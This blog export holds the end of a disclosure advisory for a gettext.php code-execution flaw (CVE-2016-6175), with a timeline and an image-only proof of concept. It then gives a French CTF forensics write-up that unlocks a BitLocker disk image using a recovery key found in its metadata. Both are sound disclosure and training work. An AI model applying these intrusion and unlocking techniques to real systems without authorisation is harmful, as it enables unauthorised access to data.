<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
This issue affect the latest GETTEXT .PHP version and were found
in latest stable NAGVIS (1.8.5) version.</div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
It could affect the a lot of web application and/or many website as
long as it will not be updated.</div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
</div>
<div style="border-bottom: 1.05pt double #000000; border-left: none; border-right: none; border-top: none; font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm; padding-bottom: 0.07cm; padding-left: 0cm; padding-right: 0cm; padding-top: 0cm;">
VII. TIMELINE</div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<b>June 21th, 2016</b>: Vulnerability identification</div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<b>June 21th, 2016</b>: Nagvis project developers and gettext.php developers
notification</div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<b>June 22th, 2016</b>: Nagvis project developers response</div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<b>June 25th, 2016</b>: Nagvis Patch release (even if not really affected)</div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<b><span style="font-style: normal;"><span style="font-weight: normal;">June</span></span><span style="font-style: normal;"><span style="font-weight: normal;">
</span></span><span style="font-style: normal;"><span style="font-weight: normal;">27</span></span></b><span style="font-style: normal;"><span style="font-weight: normal;"><b>th,
2016</b>: </span></span><span style="font-style: normal;"><span style="font-weight: normal;">Gettext.php
team response (from </span></span>Danilo Šegan), exchange started</div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<b>July 5th, 2016</b>:
CVE request ID (mitre) and OVE ID request</div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<b>July 7th, 2016</b>:
<i><b>CVE-2016-6175</b></i> attributed by MITRE</div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<b>July 25th, 2016</b>: Public disclosure</div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="border-bottom: 1.05pt double #000000; border-left: none; border-right: none; border-top: none; font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm; padding-bottom: 0.07cm; padding-left: 0cm; padding-right: 0cm; padding-top: 0cm;">
VIII. LEGAL NOTICES</div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
The information contained within this advisory is supplied "as-is"
with</div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
no warranties or guarantees of fitness of use or otherwise.
</div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
I accept no responsibility for any damage caused by the use or misuse
of this advisory.<br />
<br />
<br />
[CVE-2016-6175] gettext.php code execution - PoC example:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKFOfVjdEf47tJ1KcjuePCuJai7aKaiyomu6trOjKr5Zv2R8KxtST2h03w1E7yXksQJ_23iJZGIvI3X0Mb5BHU48kuhNY73DEyI6PMWidVf0Z7FL7tUy2xgjdQylVJG2Wj9Pn-CQDwXbhB/s1600/cve-2016-6175.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="314" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKFOfVjdEf47tJ1KcjuePCuJai7aKaiyomu6trOjKr5Zv2R8KxtST2h03w1E7yXksQJ_23iJZGIvI3X0Mb5BHU48kuhNY73DEyI6PMWidVf0Z7FL7tUy2xgjdQylVJG2Wj9Pn-CQDwXbhB/s640/cve-2016-6175.png" width="640" /></a></div>
<br />
<br /></div>
<div style="font-style: normal; font-weight: normal; line-height: 100%; margin-bottom: 0cm;">
<br /></div>
kmkzhttp://www.blogger.com/profile/11354372095868320290noreply@blogger.com0tag:blogger.com,1999:blog-4457623080129847893.post-10738202627949328512016-03-05T18:21:00.002+01:002016-03-05T18:27:41.393+01:00[Write-Up] ESGI CTF 2k16 ForensicGio (Forensic 400)Salut à tous,<br />
ce jeudi avait lieu le <b>CTF du Security Day 2016</b> de l'<a href="http://hacklab-esgi.fr/" target="_blank"><b>ESGI</b> Paris</a> et auquel notre team <b>sec0d</b> participait enfin du moins ceux qui étaient là :P.<br />
<br />
Durant ce CTF nombre de challz ont été poncés mais un en particulier sur lequel j'ai passé un moment me donne envie d'écrire ce write-up car j'avoue l'avoir pas mal apprécié (merci<b>@Sug4r7</b> de l'avoir concocté).<br />
Allez, allons-y et arrêtons de "blablater" !<br />
<br />
Le début du chall débute par la récupération de 2 archives tar.gz.<br />
L'une contenant le chall et l'autre son checksum md5 pour valider de son intégrité, <u>l'objectif pour valider ce chall étant de récupérer un flag ainsi qu'une adresse mail</u>, allez, on se lance!!<br />
<br />
Ces fichiers downloadés on check le md5 puis on extract le contenu de l'archive et faisons un "file" dessus afin de déterminer ce à quoi nous avons affaire:<br />
<br />
<blockquote class="tr_bq">
<span style="color: #999999;"><span style="background-color: white;"># cat CTF_security_day_2016.tar.gz.md5 </span></span><br />
<span style="background-color: white;"><span style="color: #444444;"><b>2b5dfdabf403b309c35d72b455a96201</b></span>:CTF_security_day_2016.tar.gz</span><br />
<span style="background-color: white;"><br /></span>
<span style="color: #999999;"><span style="background-color: white;"># md5sum CTF_security_day_2016.tar.gz</span></span><br />
<span style="background-color: #cccccc;"><span style="background-color: white;"><span style="color: #444444;"><b>2b5dfdabf403b309c35d72b455a96201</b></span></span> </span></blockquote>
L'archive extraitre révèle un format appelé <b>EWF</b> (Expert Witness Compression Format) généré par certains tools de dump de media et/ou partitions tel que <b>ewfacquire</b> sous linux.<br />
<br />
Ayant pu identifier la facilité de certains challs présent je tente un "string"<br />
dessus et jouant avec "grep" afin de voir si j'en ressort quelques chose mais .. ce chall n'est pas aussi facile, poursuivons.<br />
<br />
Kali Linux possède nativement nombre de tools pour jouer avec les dumps ewf alors je teste <b>ewfinfo</b> dans une première approche de collecte d'info et, une fois le fichier renommé avec l'extension (<span style="color: red;"><b>.s01</b></span>) qui va bien, j'obtiens déjà quelques résultat:<br />
<blockquote class="tr_bq">
<pre><span style="background-color: white;">ewfinfo CTF_security_day_2016.s01
ewfinfo 20140608
Acquiry information
Case number: 1
Description: Security Day ESGI 2016 - Level: easy
Examiner name: IT Forensic investigator
Evidence number: 1
Notes: 578589-646712-118349-156013-637549-351670-297187-312191
Acquisition date: Thu Mar 3 03:17:59 2016
System date: Thu Mar 3 03:17:59 2016
Operating system used: Linux
Software version used: 20130416
Password: N/A
Model: DataBar USB2.0
EWF information
File format: EnCase 6
Sectors per chunk: 64
Error granularity: 64
Compression method: deflate
Compression level: best compression
Set identifier: 6e1ec0c6-715f-f848-9119-e59a9b00dcc0
Media information
Media type: removable disk
Is physical: yes
Bytes per sector: 512
Number of sectors: 2015232
Media size: 984 MiB (1031798784 bytes)
Digest hash information
MD5: fff71a85859a1af7ede437178d701809
SHA1: cf0b504bd9ea6e1b7183c9652ed3a402f12b4551</span></pre>
</blockquote>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
Ok, première info intéréssante, pour la suite nous allons donc extraire le contenu du dump vers un format plus standard à l'aide de l'outils <b>ewfexport</b><br />
<br />
L'outil une fois lancé demande vers quel format l'extraire etc.. il suffit de laisser cela par défaut puis de donner un nom de fichier une fois qu'il le demander.<br />
Il s'appelera donc "<span style="color: red;">CTF2.raw</span>" pour la suite. <br />
<br />
De là je me dis que peut-être serait-il possible de récupérer quelque chose via un peu de file carving, je lance donc un "<b>foremost</b>", hélas son output nous ramène à la raison: non ce ne sera pas aussi simple malgrès le "easy" ci-dessus!!<br />
<br />
<blockquote class="tr_bq">
<pre><span style="background-color: white;">Foremost started at Fri Mar 4 01:19:56 2016
Invocation: foremost CTF2.raw
Output directory: /root/Bureau/CTF/ESGI/foren/output
Configuration file: /etc/foremost.conf
------------------------------------------------------------------
File: CTF2.raw
Start: Fri Mar 4 01:19:56 2016
Length: 984 MB (1031798784 bytes)
Num Name (bs=512) Size File Offset Comment
Finish: Fri Mar 4 01:20:12 2016
0 FILES EXTRACTED
------------------------------------------------------------------
Foremost finished at Fri Mar 4 01:20:12 2016</span></pre>
</blockquote>
Okay okay ... voyons donc voir la table de partition présente sur ce dump grâce à l'outils <span style="color: red;"><span style="color: black;"><b>mmls</b>.</span></span><br />
<br />
<blockquote class="tr_bq">
<pre><span style="background-color: white;">mmls CTF2.raw
DOS Partition Table
Offset Sector: 0
Units are in 512-byte sectors
Slot Start End Length Description
000: Meta 0000000000 0000000000 0000000001 Primary Table (#0)
001: ------- 0000000000 0000002047 0000002048 Unallocated
<span style="color: red;">002: 000:000 0000002048 0002015231 0002013184 NTFS / exFAT (0x07)</span></span></pre>
</blockquote>
Une partition windows semble bien présente, un simple "file" dessus indique même "<span style="color: red;"><b>DOS/MBR Boot Sector</b></span>" ce qui indique donc que ce serait probablement bootable.<br />
Après quelque manipulations foireuses et bricolages en tout genre, je découvre un tools appelé <a href="https://raw.githubusercontent.com/gleeda/misc-scripts/master/misc_python/mbr_parser.py" target="_blank"><b>mbr_parser.py</b></a> permettant de parser ce type de fichier et d'en remonter certaines infos ce qui permet donc d'affirmer que non, pas bootable :-/<br />
<br />
<blockquote class="tr_bq">
<pre><span style="background-color: white;">===== Partition Table #1 =====
Boot flag: <span style="color: red;">0x0 </span>
Partition type: 0x7 (<span style="color: red;">NTFS</span>)
Starting Sector (LBA): 0x800 (2048)
Starting CHS: Cylinder: 0 Head: 32 Sector: 33
Ending CHS: Cylinder: 125 Head: 112 Sector: 51
Size in sectors: 0x1eb800 (2013184)
===== Partition Table #2 =====
Boot flag: <span style="color: red;">0x0 </span>
Partition type: 0x0 (Empty)
Starting Sector (LBA): 0x0 (0)
Starting CHS: Cylinder: 0 Head: 0 Sector: 0
Ending CHS: Cylinder: 0 Head: 0 Sector: 0
Size in sectors: 0x0 (0)
===== Partition Table #3 =====
<span style="color: red;">Boot flag: 0x0 </span>
Partition type: 0x0 (Empty)
Starting Sector (LBA): 0x0 (0)
Starting CHS: Cylinder: 0 Head: 0 Sector: 0
Ending CHS: Cylinder: 0 Head: 0 Sector: 0
Size in sectors: 0x0 (0)
===== Partition Table #4 =====
<span style="color: red;">Boot flag: 0x0 </span>
Partition type: 0x0 (Empty)
Starting Sector (LBA): 0x0 (0)
Starting CHS: Cylinder: 0 Head: 0 Sector: 0
Ending CHS: Cylinder: 0 Head: 0 Sector: 0
Size in sectors: 0x0 (0)
Valid Signature (0xaa55): True => (0xaa55)</span></pre>
</blockquote>
<br />
Nous savons alors que ce ne sera pas bootable en l'état, ok, j'ai donc pratiqué à l'extraction de chacune des partition à l'aide de <b>dd</b> en espérant que la bonne partition pourra être montée et que ce sera alors la fin de ce chall.<br />
Nous avions donc obtenu la liste des partitions et pouvions à préent les extraire de ce dump:<br />
<blockquote class="tr_bq">
<div class="" id="magicdomid46">
<span class="author-a-1qz75zqz65zcz70zz82z4z76z6z70zysz71zz89z"> </span><br />
<pre><span style="background-color: white;">dd if=CTF2.raw of=CTF2_0.bin bs=512 skip=0 count=1
dd if=CTF2.raw of=CTF2_1.bin bs=512 skip=2048 count=2015231
file *.bin
CTF2_0.bin: DOS/MBR boot sector; partition 1 : ID=0x7, start-CHS (snip)
CTF2_1.bin: DOS/MBR boot sector, code offset 0x58+2, OEM-ID "-FVE-FS-" (snip)</span></pre>
</div>
</blockquote>
<blockquote class="tr_bq">
</blockquote>
en revanche lors de divers essais, il s'est avéré impossible de monter le volume souhaité sur ma linux, cette partition n'étant visiblement pas "standard".<br />
A partir de la, changement de stratégie.<br />
<br />
Le mount ne passant toujours pas en <b>vfat</b> via <b>dd</b> ainsi qu'avec l'outils <b>ewfmount</b> sur le premier dump ewf de l'archive, nous comprenons qu'il faut essayer autre chose.<br />
<blockquote class="tr_bq">
<pre><span style="background-color: white;">dd if=CTF2.raw of=new.img count=1 bs=1000MiB
file new.img
new.img: DOS/MBR boot sector; partition 1 (snip)
</span></pre>
</blockquote>
L'idée sera donc la suivante:<br />
<ol>
<li>prendre le fichier new.img et le convertir en vmdk via qemu</li>
<li>rattacher ce vmdk à une machine virtuelle Windows et essayer de monter le volume</li>
</ol>
C'est la que mon coéquipier <span style="color: blue;"><b><span style="color: black;">Orikata</span> </b><span style="color: black;">et sa machine sont intervenus!</span></span><br />
<span style="color: blue;"><span style="color: black;">La converion via Qemu faite<code><i>:</i></code></span></span><br />
<blockquote class="tr_bq">
<pre> /qemu-img convert -f raw -O vmdk /Volumes/xxx/new.img /Volumes/xxx/new.vmdk</pre>
</blockquote>
<div class="separator" style="clear: both; text-align: center;">
</div>
il suffit de rattacher le vmdk en tant que volume à une VM Windows puis... SURPRISE!!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgS_750q6nYClYalWSSWSrOvmnQfHoGWjUwuonVs53ZyJwxh7kG6xJDglAS-PfiVVrgf5-17zHMZQzO6Tq9yTOXMeqa7FNUVb-I2JsANIFDiXgrAT1RGr5X5CrPF6wXLUwNIVr-8hZe86ZD/s1600/F511BF5A-8944-4900-9F27-16B6D38427C7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgS_750q6nYClYalWSSWSrOvmnQfHoGWjUwuonVs53ZyJwxh7kG6xJDglAS-PfiVVrgf5-17zHMZQzO6Tq9yTOXMeqa7FNUVb-I2JsANIFDiXgrAT1RGr5X5CrPF6wXLUwNIVr-8hZe86ZD/s640/F511BF5A-8944-4900-9F27-16B6D38427C7.png" width="640" /></a></div>
<span style="color: blue;"><span style="color: black;"><code style="background-image: none!important; border-bottom-left-radius: 0px!important; border-bottom-right-radius: 0px!important; border-top-left-radius: 0px!important; border-top-right-radius: 0px!important; border: 0px!important; direction: ltr!important; display: inline!important; float: none!important; font-family: Consolas,'Bitstream Vera Sans Mono','Courier New',Courier,monospace!important; font-size: 16px; line-height: 17.6px; margin: 0px!important; min-height: auto!important; outline: 0px!important; overflow: visible!important; padding: 0px!important; vertical-align: baseline!important; white-space: pre-wrap; width: auto!important;"> </code> </span></span><br />
Un volume Bitlocker!<br />
Voici donc la raison du temps perdu à tenter de le monter en vain sur ma Kali :/.<br />
Ok, à partir de la comment faire pour monter ce volume sans la clef?<br />
Et bien compliqué mais <b>Orikata</b> se rappellant qu'il est possible de monter le container via la clef de récupération via l'onglet "j'ai oublié mon mot de passe"<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjY3TuQnUFqmqy3bKhbGMMLrFQPitO8kwvc-TYY8xU6xx7UgYsfkHOhzJUxXZfcsnUK9Edbd4fn6knSoJt4VgbYu8d_Gzy34e_bnVx1wftMVVe9BMzBmrQDlT_aBD11r8um-F3riUiiOV6F/s1600/1D414877-E30E-4D50-972D-D781EF16C1A4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="264" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjY3TuQnUFqmqy3bKhbGMMLrFQPitO8kwvc-TYY8xU6xx7UgYsfkHOhzJUxXZfcsnUK9Edbd4fn6knSoJt4VgbYu8d_Gzy34e_bnVx1wftMVVe9BMzBmrQDlT_aBD11r8um-F3riUiiOV6F/s320/1D414877-E30E-4D50-972D-D781EF16C1A4.png" width="320" /></a></div>
<br />
et que cette dernière est de la forme <span style="color: orange;"><b><span style="color: red;">8 x 6 </span></b><span style="color: black;">chars séparés par des "</span><b><span style="color: red;">-</span></b><span style="color: black;">"</span><span style="color: black;">.</span></span><br />
Nous nous replongeons dans la collecte d'info faites en amont et remarquons quelques chose d'étrange.<br />
Il s'agit d'une note contenue dans les métadata du dump initial ewf et qui n'est sûrement pas le fruit du hasard rappellez-vous de cela:<br />
<span style="background-color: #cccccc;"><br /></span>
<br />
<div style="color: black; font-family: Calibri,sans-serif; font-size: 14px;">
<div style="font-family: monospace; font-size: 12px; line-height: 16px; margin: 0px; padding: 0px; text-align: left;">
<span style="background-color: white;"><span style="margin: 0px; padding: 1px 0px;">ewfinfo CTF_security_day_2016.s01 </span></span></div>
<div style="font-family: monospace; font-size: 12px; line-height: 16px; margin: 0px; padding: 0px; text-align: left;">
<span style="background-color: white;"><span style="margin: 0px; padding: 1px 0px;">ewfinfo 20140608</span></span></div>
<div style="font-family: monospace; font-size: 12px; line-height: 16px; margin: 0px; padding: 0px; text-align: left;">
<span style="background-color: white;"><br style="margin: 0px; padding: 0px;" /></span></div>
<div style="font-family: monospace; font-size: 12px; line-height: 16px; margin: 0px; padding: 0px; text-align: left;">
<span style="background-color: white;"><span style="margin: 0px; padding: 1px 0px;">Acquiry information</span></span></div>
<div style="font-family: monospace; font-size: 12px; line-height: 16px; margin: 0px; padding: 0px; text-align: left;">
<span style="background-color: white;"><span style="margin: 0px; padding: 1px 0px;"> Case number: 1</span></span></div>
<div style="font-family: monospace; font-size: 12px; line-height: 16px; margin: 0px; padding: 0px; text-align: left;">
<span style="background-color: white;"><span style="margin: 0px; padding: 1px 0px;"> Description: Security Day ESGI 2016 - Level: easy</span></span></div>
<div style="font-family: monospace; font-size: 12px; line-height: 16px; margin: 0px; padding: 0px; text-align: left;">
<span style="background-color: white;"><span style="margin: 0px; padding: 1px 0px;"> Examiner name: IT Forensic investigator</span></span></div>
<div style="font-family: monospace; font-size: 12px; line-height: 16px; margin: 0px; padding: 0px; text-align: left;">
<span style="background-color: white;"><span style="margin: 0px; padding: 1px 0px;"> Evidence number: 1</span></span></div>
<div style="font-family: monospace; font-size: 12px; line-height: 16px; margin: 0px; padding: 0px; text-align: left;">
<span style="color: red;"><span style="background-color: white;"><span style="margin: 0px; padding: 1px 0px;"> Notes: <b> </b></span><b><span style="margin: 0px; padding: 1px 0px;">578589-646712-118349-156013-<wbr></wbr>637549-351670-297187-312191</span></b></span></span></div>
<div style="font-family: monospace; font-size: 12px; line-height: 16px; margin: 0px; padding: 0px; text-align: left;">
<span style="background-color: white;"><span style="margin: 0px; padding: 1px 0px;"> Acquisition date: Thu Mar 3 03:17:59 2016</span></span></div>
<div style="font-family: monospace; font-size: 12px; line-height: 16px; margin: 0px; padding: 0px; text-align: left;">
<span style="background-color: white;"><span style="margin: 0px; padding: 1px 0px;"> System date: Thu Mar 3 03:17:59 2016</span></span></div>
<div style="font-family: monospace; font-size: 12px; line-height: 16px; margin: 0px; padding: 0px; text-align: left;">
<span style="background-color: white;"><span style="margin: 0px; padding: 1px 0px;"> Operating system used: Linux</span></span></div>
<div style="font-family: monospace; font-size: 12px; line-height: 16px; margin: 0px; padding: 0px; text-align: left;">
<span style="background-color: white;"><span style="margin: 0px; padding: 1px 0px;"> Software version used: 20130416</span></span></div>
<div style="font-family: monospace; font-size: 12px; line-height: 16px; margin: 0px; padding: 0px; text-align: left;">
<span style="background-color: white;"><span style="margin: 0px; padding: 1px 0px;"> Password: N/A</span></span></div>
<div style="font-family: monospace; font-size: 12px; line-height: 16px; margin: 0px; padding: 0px; text-align: left;">
<span style="background-color: white;"><span style="margin: 0px; padding: 1px 0px;"> Model: <span style="color: red;">DataBar</span> USB2.0</span></span></div>
<div style="font-family: monospace; font-size: 12px; line-height: 16px; margin: 0px; padding: 0px;">
<span style="background-color: #c3eeb5; margin: 0px; padding: 1px 0px;"><span style="background-color: white;"></span><br /></span></div>
</div>
Nous tentons alors de pratiquer de cette manière afin de bypasser la clef du Bitlocker et...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPXOdZuvNxOWEF6C_UtzXYWpLzuP_hfZPWH6Q-QPKJE5bYz2Bc8gpa4LFziphvIgzZbDVgebWO3aXCtpLoPGjIST_RXBTxsN8a58Q5dtuCPJSgq8INLUwrYszQ2LFJY036wiZJqSoriPej/s1600/475B08A3-79B3-43E4-A4B5-B9E6218E5087.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="244" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPXOdZuvNxOWEF6C_UtzXYWpLzuP_hfZPWH6Q-QPKJE5bYz2Bc8gpa4LFziphvIgzZbDVgebWO3aXCtpLoPGjIST_RXBTxsN8a58Q5dtuCPJSgq8INLUwrYszQ2LFJY036wiZJqSoriPej/s640/475B08A3-79B3-43E4-A4B5-B9E6218E5087.png" width="640" /></a></div>
<br />
Le container nous offre deux fichiers: le 1er contenant juste un peu de texte rappellant les obectifs du challenges, le second quant à lui étant un .psd que l'on s'empresse d'ouvrir sous <b>Gimp </b>ce qui nous permet d'identifier des claques présent cachant un flag dans la bouche d'un espèce de dinosaure.<br />
<br />
Image de base avec la bonne promo pour la boite de notre ami @Sug4r7 qui a créer ce chall:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvogQbI7XXI5kQHHHwG0k9AbsOIjILKswt1Wtdld6pEvBBIwmVcn4pxV3TxV58UahvHGXzk5D3eU5ISNMdrrdDtFyS1kwOI2KUiTuPFR0l3HkW7GaaBMJ0cC35TcW6EAkNhNeMT-lbsW05/s1600/CTF_1.info.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvogQbI7XXI5kQHHHwG0k9AbsOIjILKswt1Wtdld6pEvBBIwmVcn4pxV3TxV58UahvHGXzk5D3eU5ISNMdrrdDtFyS1kwOI2KUiTuPFR0l3HkW7GaaBMJ0cC35TcW6EAkNhNeMT-lbsW05/s640/CTF_1.info.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
Les filtres:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTolq-mxzi1qjzrSMFGwY7YqD7YuyIhFH5MSoW78gaSnKVxTNhu_2p0NA7Z-HhbgIdltSBy2LKZdBtPiCMkQZKQ99FO7sxnNGTECz3eCKCid4bFgOnEZ1XrHcSp0hmrEKUzcsJhhLnItIe/s1600/unnamed.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTolq-mxzi1qjzrSMFGwY7YqD7YuyIhFH5MSoW78gaSnKVxTNhu_2p0NA7Z-HhbgIdltSBy2LKZdBtPiCMkQZKQ99FO7sxnNGTECz3eCKCid4bFgOnEZ1XrHcSp0hmrEKUzcsJhhLnItIe/s400/unnamed.png" width="206" /></a></div>
<br />
Le filtre "code_ctf" attire immédiatement notre attention mais hélas se trouve illisible:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRJM_vS-gVsgoNcYUeIl1GNM-ZCEYUr-xnDYegJZETp0wD_ONRp5943jSkQAfk_b3d5K8ugakL7ir7JaMjQcwlBXMn8JWPGSbb2pgFgXp4bDwwvT9MKHm8zd-F3FUGtXbzCw0xqQIp1XPV/s1600/index.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="312" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRJM_vS-gVsgoNcYUeIl1GNM-ZCEYUr-xnDYegJZETp0wD_ONRp5943jSkQAfk_b3d5K8ugakL7ir7JaMjQcwlBXMn8JWPGSbb2pgFgXp4bDwwvT9MKHm8zd-F3FUGtXbzCw0xqQIp1XPV/s400/index.png" width="400" /></a></div>
<br />
Afin de gagner du temps, je décide donc de lire les métadata du fichier image de base via <b>exiftool</b> et obtient entre autre alors le fameux flag tant désiré.<br />
<br />
<blockquote class="tr_bq">
<pre>ExifTool Version Number : 10.11
<span style="color: red;">File Name : CTF_1.info</span>
Directory : .
File Size : 22 MB
File Modification Date/Time : 2016:03:03 01:42:37+01:00
File Access Date/Time : 2016:03:05 15:45:08+01:00
File Inode Change Date/Time : 2016:03:04 04:33:39+01:00
File Permissions : rwxrwxrwx
File Type : PSD
File Type Extension : psd
MIME Type : application/vnd.adobe.photoshop
Num Channels : 3
Image Height : 1600
Image Width : 2560
Bit Depth : 8
Current IPTC Digest : cdcffa7da8c7be09057076aeaf05c34e
Coded Character Set : UTF8
Application Record Version : 0
IPTC Digest : cdcffa7da8c7be09057076aeaf05c34e
XMP Toolkit : Adobe XMP Core 5.5-c021 79.155772, 2014/01/13-19:44:00
Document ID : adobe:docid:photoshop:8e502fea-e0d3-11e5-88dd-8346bba80fd1
Instance ID : xmp.iid:a366f090-0622-9343-b206-ee4e314c205f
Original Document ID : 54597A271ED407F91E4348F2B8D7EDD3
History Action : saved, converted, derived, saved, saved
History Instance ID : xmp.iid:4e124a83-f328-dd45-bc25-d93c357610c7, xmp.iid:229920ec-c5e4-f34c-84f6-4a06983a49ff, xmp.iid:a366f090-0622-9343-b206-ee4e314c205f
History When : 2016:03:03 01:05:46+01:00, 2016:03:03 01:05:46+01:00, 2016:03:03 01:42:37+01:00
History Software Agent : Adobe Photoshop CC 2014 (Windows), Adobe Photoshop CC 2014 (Windows), Adobe Photoshop CC 2014 (Windows)
History Changed : /, /, /
History Parameters : from image/jpeg to application/vnd.adobe.photoshop, converted from image/jpeg to application/vnd.adobe.photoshop
Derived From Instance ID : xmp.iid:4e124a83-f328-dd45-bc25-d93c357610c7
Derived From Document ID : 54597A271ED407F91E4348F2B8D7EDD3
Derived From Original Document ID: 54597A271ED407F91E4348F2B8D7EDD3
Format : application/vnd.adobe.photoshop
Color Mode : RGB
<span style="color: red;">Text Layer Name : code_ctf
Text Layer Text : CODE CTF: 20160303_A27R425</span>
Document Ancestors : 54597A271ED407F91E4348F2B8D7EDD3
Create Date : 2016:03:03 00:59:27+01:00
Metadata Date : 2016:03:03 01:42:37+01:00
X Resolution : 72
Displayed Units X : inches
Y Resolution : 72
Displayed Units Y : inches
Global Angle : 30
Global Altitude : 30
Photoshop Thumbnail : (Binary data 4789 bytes, use -b option to extract)
Has Real Merged Data : No
Writer Name : Adobe Photoshop
Reader Name : Adobe Photoshop CC 2014
Exif Byte Order : Big-endian (Motorola, MM)
Bits Per Sample : 8 8 8
Photometric Interpretation : RGB
Orientation : Horizontal (normal)
Samples Per Pixel : 3
Resolution Unit : inches
Software : Adobe Photoshop CC 2014 (Windows)
Modify Date : 2016:03:03 01:42:37
Exif Version : 0221
Color Space : Uncalibrated
Exif Image Width : 2560
Exif Image Height : 1600
Compression : JPEG (old-style)
Thumbnail Offset : 386
Thumbnail Length : 0
Image Size : 2560x1600
Megapixels : 4.1</pre>
</blockquote>
<br />
<div style="text-align: center;">
<b><span style="color: red;"><span class="author-a-nwabhaz72zvcz80zz87zwtlz89zz87z">CODE CTF: 20160303_A27R425</span></span></b></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<span style="color: red;"><span class="author-a-nwabhaz72zvcz80zz87zwtlz89zz87z"><span style="color: black;">Malheureusement il ne nous permis pas de valider cette épreuve car sans l'adresse mail du destinataire impossible de le valider.... frustration extême car cela nous pris tout de même pas mal de temps pour au final 0 points!</span></span></span></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<span style="color: red;"><span class="author-a-nwabhaz72zvcz80zz87zwtlz89zz87z"><span style="color: black;">Cela étant, ça méritait bien un petit write-up ne serait-ce que parcequ'il ne fû validé qu'une seule fois par la team gagnante et que d'autre aimerait sûrement savoir comment il fallait procéder ;-).</span></span></span></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<span style="color: red;"><span class="author-a-nwabhaz72zvcz80zz87zwtlz89zz87z"><span style="color: black;">Le mail pour sa part ne semblait réèllement pas présent ici, en tout cas pas à notre connaissance et la fin de ce CTF arriva avec pour la <b>sec0d</b> la 5ème place et des cadeaux tout de même obtenus!! :-)</span></span></span><br />
<br />
<span style="color: red;"><span class="author-a-nwabhaz72zvcz80zz87zwtlz89zz87z"><span style="color: black;">A bientôt pour un prochain writeup ou paper.</span></span></span><br />
<span style="color: red;"><span class="author-a-nwabhaz72zvcz80zz87zwtlz89zz87z"><span style="color: black;">kmkz</span></span></span><br />
<br />
<br />
<div style="text-align: left;">
<div style="text-align: center;">
<b><span style="color: red;"><span class="author-a-nwabhaz72zvcz80zz87zwtlz89zz87z"><span style="color: black;"><u>Quelques liens utiles pour ce challenge Forensic</u></span></span></span></b></div>
</div>
<div style="text-align: left;">
<span style="color: blue;"><span style="color: #3d85c6;"><span style="background-color: white;"><span style="color: blue;"><br /></span></span></span></span></div>
<div style="text-align: left;">
<span style="color: blue;"><span style="color: #3d85c6;"><span style="background-color: white;"><span style="color: blue;"><a href="http://www.sleuthkit.org/sleuthkit/man/mmls.html" target="_blank">mmls</a></span></span></span></span></div>
<div style="text-align: left;">
<span style="color: blue;"><span style="color: #3d85c6;"><span style="background-color: white;"><span style="color: blue;"><br /></span></span></span></span></div>
<div style="text-align: left;">
